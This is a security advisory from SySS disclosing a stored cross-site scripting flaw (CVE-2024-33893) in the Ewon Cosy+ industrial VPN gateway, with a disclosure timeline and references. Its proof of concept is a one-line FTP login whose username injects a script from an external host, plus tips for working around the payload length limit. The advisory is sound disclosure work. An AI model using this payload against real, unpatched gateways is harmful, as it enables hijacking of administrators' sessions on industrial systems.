Ewon Cosy+ Improper Neutralization / Cross Site Scripting

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2024-016  
Product: Ewon Cosy+  
Manufacturer: HMS Industrial Networks AB  
Affected Version(s): Firmware Versions: < 21.2s10 and < 22.1s3  
Tested Version(s): Firmware Version: 21.2s7  
Vulnerability Type: Improper Neutralization of Input During Web Page Generation (CWE-79)  
Risk Level: Medium  
Solution Status: Fixed  
Manufacturer Notification: 2024-03-27  
Solution Date: 2024-07-18  
Public Disclosure: 2024-08-11  
CVE Reference: CVE-2024-33893  
Author of Advisory: Moritz Abrell, SySS GmbH  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
The Ewon Cosy+ is a VPN gateway used for remote access and maintenance  
in industrial environments.  
  
The manufacturer describes the product as follows (see [1]):  
  
"The Ewon Cosy+ gateway establishes a secure VPN connection between  
the machine (PLC, HMI, or other devices) and the remote engineer.  
The connection happens through Talk2m, a highly secured industrial  
cloud service. The Ewon Cosy+ makes industrial remote access easy  
and secure like never before!"  
  
Due to improper neutralization of input, an unauthenticated attacker  
is able to inject HTML and JavaScript code into the administrative  
web interface of the device.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
If login against the FTP service of the Cosy+ fails, the submitted  
username is saved in a log.  
This log is included in the Cosy+ web interface without neutralizing  
the content.  
As a result, an unauthenticated attacker is able to inject  
HTML/JavaScript code via the username of an FTP login attempt.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
1. Login attempt against Cosy+ FTP service:  
#> ftp "<script src=//x>"@192.168.10.33  
  
2. JavaScript is included when visiting the event logs on Cosy+ web  
interface (http://192.168.10.33/index.shtm#EVLogsTbl):  
  
<div class="x-grid-cell-inner " style="text-align:left;">  
eftp-Close FTP session (User: <script src="//x">  
</div">  
  
Note:  
The FTP username is limited to 16 characters and therefore the  
payload length is limited too.  
However, exploitation is still possible, e.g. by controlling  
DNS responses or using short URLs, e.g. an emoji domain.  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
According to the manufacturer note[4], the vulnerability was fixed  
with the firmware versions 21.2s10 and 22.1s3.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2024-03-26: Vulnerability discovered  
2024-03-27: Vulnerability reported to manufacturer  
2024-04-02: Inquiry about the status  
2024-04-05: Manufacturer acknowlegded the vulnerability and started the  
analysis  
2024-04-10: Two more vulnerabilities reported to the manufacturer  
(SYSS-2024-032 and SYSS-2024-033)  
2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for  
a publication date for all findings  
2024-04-12: Proposed dates for a discussion about publication  
2024-04-15: Manufacturer sent a technical overview of planned remediation  
actions and details about the planned timeline  
2024-04-15: Acknowlegded the remediation actions and asked the manufacturer  
to assign a CVE ID  
2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer  
2024-05-31: Manufacturer informed that the fix is in completion stage and  
asked if the blog post[6] can be reviewed by HMS  
2024-06-04: Proposed dates to review the blog post draft  
2024-06-21: Inquiry about the status  
2024-06-21: Received an out-of-office auto reply  
2024-07-01: Inquiry about the status  
2024-07-04: Inquiry about the status  
2024-07-12: Inquiry about the status and letting the manufacturer know that  
the vulnerability will be published within a talk at DEF CON[7]  
in August  
2024-07-12: Manufacturer responded that the fix is planned by the end of  
July; manufacturer asked again for reviewing the blog post  
draft  
2024-07-12: Again confirmed reviewing the blog post is possible and asking  
for the sending of details  
2024-07-17: Blog post provided to HMS  
2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS  
2024-07-23: Inquiry about the status  
2024-07-23: Manufacturer reviewed the blog post and confirmed that a  
fix is provided  
2024-07-29: Discussion with HMS about the blog post and final publication  
actions  
2024-08-11: Vulnerability disclosed at DEF CON[7]  
2024-08-11: Blog post published[6]  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Ewon Cosy+ product website  
https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet  
[2] SySS Security Advisory SYSS-2024-016  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-016.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/responsible-disclosure-policy  
[4] Manufacturer note  
https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf  
[5] CVE-2024-33893  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33893  
[6] Blog post  
https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/  
[7] DEF CON talk  
https://defcon.org/html/defcon-32/dc-32-speakers.html#54521  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Moritz Abrell of SySS GmbH.  
  
E-Mail:[email protected]  
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc  
Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----  
  
iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay4vsACgkQrgyb+PE0  
i1M+GA//R3tvHZW7B21Kf+8aZcVONuL56yzPOyqEdISB0joFi9yvzGkqCJPYws5t  
vFojVlZT38COf64ZC2siFQCJrtOzMa+zWT3kpSeBFsNQ60Sx79UaCdQVa6GjpZm/  
8qSNWtCpOMGmj95FwYaHuZbKxiSifyIjsVteADqiaysWVx7kXapktPSD2KiOBJSp  
Ycg81WfRS10ELiUWoLZ5GTXhzQKzH0Tsh6h1qNHWy5GkHLwIQKkzicQ5wR1ZRzK4  
o6k8cJySgAqgJ3gmGU9iUUElppPXj7EFOK7m8q0ny5gQpQfz3dMPxJz5eK8zBazd  
1c9OjgdZNcgzschhKsl/JX+3YVGQzmNo5rSOIbJS4+7Oe0UcTaggzbgj80GGOakT  
vLC9GqmgYUsv+yr2Dp10pUg/plySeScDhYlkZ+VN9GDcEVodiKzM6wukj1eDEw0+  
6CzHKnGvKOa322AVnKF+xdB/c+sDCEaD73S47gt8CfG57J7bcpth3Gf9RkLtLFXC  
U3yiT7FmY/KH7WZvmnyhsk/Go66aGRy0d1hQl/tzdnBVdDn1IZToymnC/YVDxqxc  
Q9GsDhkpDOyozgrhUdef64RY5ZOzXcpNJvCM1RxjP65ZMxiPpZ0z/3IuGJ+DUWkM  
f8Sm21hfsgkq8UmnLtSnDCUyPTxJISTK9lwleYkqodqJrXUlUD0=  
=HV5Q  
-----END PGP SIGNATURE-----  
  
`